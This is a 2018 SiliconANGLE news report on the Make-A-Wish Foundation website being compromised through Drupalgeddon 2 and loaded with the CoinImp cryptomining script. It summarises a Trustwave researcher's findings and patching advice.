UPDATED 20:50 EST / NOVEMBER 19 2018

SECURITY

Make-A-Wish website cryptojacked with increasingly popular CoinImp script

Proving that some hackers have no morals whatsoever, the website of the Make-A-Wish Foundation has been “cryptojacked” to install the increasingly popular cryptomining script.

Discovered by Simon Kenin, a security researcher at Trustwave SpiderLabs, and publicized today, the hack involved unknown hackers accessing the Make-A-Wish website through a Drupal vulnerability dubbed Drupalgeddon 2.

A Drupalgeddon 2 attack takes advantage of Drupal installations that have not patched CVE-2018-7600 and CVE-2018-7602, two vulnerabilities that were first targeted by cryptomining hackers in May.

Although the attack was notable for its target, prompting The Register to ask, “Do they accept Monero in hell?” the more interesting part of the attack was the deployment of an increasingly popular form of cryptomining script.

Called CoinImp, the coin mining script first became available in December and works in a similar fashion to market leader Coinhive. Users insert javascript code on a website and visitors to the site have their computer hijacked to mine for the Monero or another cryptocurrency called webchain.network while they are visiting.

CoinImp takes a 1 percent fee on mined cryptocurrency and also offers a referral program that allows script users to sign up others to get a percentage of what their referrals mine.

“What’s interesting about this particular campaign is that it uses different techniques to avoid static detections,” Kenin wrote. “It starts with changing the domain name that hosts the JavaScript miner, which is itself obfuscated…. The WebSocket proxy also uses different domains and IPs which make blacklist solutions obsolete.”

The ability for the script to be obfuscated by traditional blacklist solutions, such as antivirus software and similar products, may result in more attacks using the script occurring.

“The CoinIMP cryptominer is growing rapidly in popularity and the combination of a well-trafficked charity site paired with the season of giving made this the perfect target for a large-scale cyberattack,” a spokesperson for Trustwave told SiliconANGLE.

Kenin noted that enterprises and other website owners should deploy endpoint protection capable of detecting cryptominers, monitor changes to their website and audit those changes to make sure they were authorized and always make sure that their website software is up-to-date with patches.

Image: CoinImp

Since you’re here …

… We’d like to tell you about our mission and how you can help us fulfill it. SiliconANGLE Media Inc.’s business model is based on the intrinsic value of the content, not advertising. Unlike many online publications, we don’t have a paywall or run banner advertising, because we want to keep our journalism open, without influence or the need to chase traffic.The journalism, reporting and commentary on SiliconANGLE — along with live, unscripted video from our Silicon Valley studio and globe-trotting video teams at theCUBE — take a lot of hard work, time and money. Keeping the quality high requires the support of sponsors who are aligned with our vision of ad-free journalism content.

If you like the reporting, video interviews and other ad-free content here, please take a moment to check out a sample of the video content supported by our sponsors, tweet your support, and keep coming back to SiliconANGLE.

Cookies

We employ the use of cookies. Find out more.